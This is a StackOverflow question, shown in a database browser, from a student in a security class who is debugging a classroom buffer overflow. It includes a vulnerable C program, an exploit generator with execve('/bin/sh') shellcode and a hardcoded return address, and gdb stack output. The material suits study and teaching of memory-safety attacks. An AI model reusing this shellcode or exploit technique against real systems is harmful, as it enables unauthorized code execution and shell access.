Databases
StackOverflow2013
Postsdbo
POGetting SIGILL when trying to execute buffer overflow attack
 

Note that there are some explanatory texts on larger screens.

plurals
  1. POGetting SIGILL when trying to execute buffer overflow attack
    primarykey
    data
    text
    <p>I'm working on my buffer overflow project for my security class, I think I have everything set up right but when I run it I get:</p> <pre><code>Program received signal SIGILL, Illegal Instruction. 0x08048500 in main(argc=4854718, argv=0x0804b008) at stack.c:22 22 fread(str,sizeof(char),517,badfile); </code></pre> <p>Heres stack.c</p> <pre><code>int bof(char *str) { char buffer[12]; /* The following statement has a buffer overflow problem */ strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char str[517]; FILE *badfile; badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str); printf("Returned Properly\n"); return 1; } </code></pre> <p>here is exploit.c</p> <pre><code>char code[]= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // movl %esp,%ebx "\x99" // cltd "\x52" // pushl %edx "\x53" // pushl %ebx "\x89\xe1" // movl %esp,%ecx "\xb0\x0b" // movb $0xb,%al "\xcd\x80" // int $0x80 ; char retaddr[] = "\x70\xF2\xFF\xBF"; void main(int argc, char **argv) { char strr[517]; strr[0] = 'Z'; strr[1] = 0; strr[2] = '\x00'; char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */ //memcpy(buffer, "EGG=", 4); memcpy(buffer, code, 24); memcpy(buffer+20,retaddr,4); memcpy(buffer+24,"\x00\x00\x00\x00",4); /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer,517,1,badfile); fclose(badfile); } </code></pre> <p>Here is the stack at runtime. Starting program: /home/john/stack </p> <pre><code>Breakpoint 1, bof ( str=0xbffff2b7 "1\300Phn/shh//bi\211\343\231RS\211\341p\362\377\277") at stack.c:13 13 strcpy(buffer, str); (gdb) x/12xw $esp 0xbffff270: 0x00000205 0xbffff298 0x004a13be 0x0804b008 0xbffff280: 0xbffff2b7 0x00000205 0xb7fef6c0 0x00584ff4 0xbffff290: 0x00000000 0x00000000 0xbffff4c8 0x0804850f (gdb) s 14 return 1; (gdb) x/12xw $esp 0xbffff270: 0xbffff284 0xbffff2b7 0x004a13be 0x0804b008 0xbffff280: 0xbffff2b7 0x6850c031 0x68732f6e 0x622f2f68 0xbffff290: 0x99e38969 0xe1895352 0xbffff270 0x08048500 (gdb) c Continuing. </code></pre> <p>Any idea why I'm getting SIGILL?</p>
    singulars
    1. PO
      singulars
      1. PTAnswer
    1. This table or related slice is empty.
    1. PTQuestion
    1. UStkausl
    1. USjwineman
    plurals
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. PO
      singulars
      1. PTAnswer
    1. VO
      singulars
      1. POGetting SIGILL when trying to execute buffer overflow attack
      1. This table or related slice is empty.
      1. VTUpMod
    2. VO
      singulars
      1. POGetting SIGILL when trying to execute buffer overflow attack
      1. This table or related slice is empty.
      1. VTUpMod
    3. VO
      singulars
      1. POGetting SIGILL when trying to execute buffer overflow attack
      1. USdrew010
      1. VTFavorite
    1. This table or related slice is empty.
 

Querying!

 
Guidance
A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload